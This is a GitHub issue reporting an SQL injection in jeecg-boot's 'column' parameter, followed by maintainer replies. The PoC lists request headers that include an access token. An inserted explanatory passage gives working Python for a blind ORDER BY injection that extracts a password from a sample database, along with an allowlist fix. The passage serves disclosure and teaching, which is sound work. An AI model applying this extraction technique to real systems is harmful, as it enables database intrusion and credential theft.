
There is an SQL injection vulnerability that can operate on the database with root privileges. #3331

Closed
Deep0 opened this issue Dec 29, 2021 · 3 comments

Deep0 commented Dec 29, 2021

version: <=3.0
precondition: After logging in to the website, click 流程管理 (process management) with Burp as the proxy; the parameter "column" is injectable with SQL.
Screenshot & code :


poc:

```http
Host: api.boot.jeecg.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Sign: 7AE7A7990565A3187D8CE30725C82718
X-Timestamp: 20211229152402
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDA3NjI2NTMsInVzZXJuYW1lIjoiamVlY2cifQ.SX0HjEOmrGFDZt-oNUUOlTNYn9ftCOmhQIOgED9HZRM
Tenant-Id: 2
Origin: http://boot.jeecg.com
Referer: http://boot.jeecg.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close
```
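The report names a request parameter called "column" as the injection point. A parameter with that name usually selects the sort column of a list query, and a column identifier cannot be bound as a prepared-statement parameter, so the usual defect is concatenating it into `ORDER BY`. The following is an added example, not code from the issue or from the jeecg-boot project: it assumes a hypothetical `sys_user` table in an in-memory SQLite database, shows how an attacker turns an injectable `ORDER BY` into a boolean oracle that reads a password column one character at a time, and shows the fix (an allowlist of permitted column names, since binding is not an option here).

```python
import sqlite3

# Allowlist of sort columns the endpoint is permitted to use (assumed names).
ALLOWED_SORT_COLUMNS = {"id", "username"}


def setup_db():
    """Constructed sample data standing in for an application user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sys_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO sys_user VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pw")],
    )
    return conn


def list_users_vulnerable(conn, column):
    """Vulnerable pattern: the sort column is concatenated straight into SQL."""
    sql = "SELECT id, username FROM sys_user ORDER BY " + column
    return [row[1] for row in conn.execute(sql)]


def list_users_safe(conn, column):
    """Hardened form: identifiers cannot be bound, so validate against an allowlist."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError("invalid sort column: %r" % column)
    sql = "SELECT id, username FROM sys_user ORDER BY " + column  # safe: allowlisted
    return [row[1] for row in conn.execute(sql)]


def oracle_payload(prefix):
    """Sort ascending by id when the guess is right, descending otherwise.

    The attacker observes which user comes first in the response and learns
    one bit per request, without any error message or UNION output.
    """
    return (
        "(CASE WHEN (SELECT password FROM sys_user WHERE username = 'admin') "
        "LIKE '%s%%' THEN id ELSE -id END)" % prefix
    )


def infer_password_char(conn, known, alphabet):
    for ch in alphabet:
        rows = list_users_vulnerable(conn, oracle_payload(known + ch))
        if rows[0] == "admin":  # ascending order => guess was correct
            return ch
    return None


def infer_password(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=32):
    """Recover admin's password through the ORDER BY oracle, one character per step."""
    known = ""
    for _ in range(max_len):
        ch = infer_password_char(conn, known, alphabet)
        if ch is None:  # no extension matched: the full value has been read
            break
        known += ch
    return known


def safe_rejects(conn, column):
    """True if the hardened query refuses the given sort column."""
    try:
        list_users_safe(conn, column)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    print("recovered via injectable ORDER BY:", infer_password(db))
    print("hardened endpoint rejects payload:", safe_rejects(db, oracle_payload("s")))
```

The alphabet deliberately excludes `%` and `_` (LIKE wildcards) and the quote character, so each guess tests exactly one prefix. The allowlist fix is the right shape for any identifier taken from the client (column, table, sort direction); escaping or a blocklist of keywords is not, because the injected text here contains nothing that a keyword filter would catch.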
zhangdaiscott (Member) commented

jl

zhangdaiscott (Member) commented

Already handled, thanks.
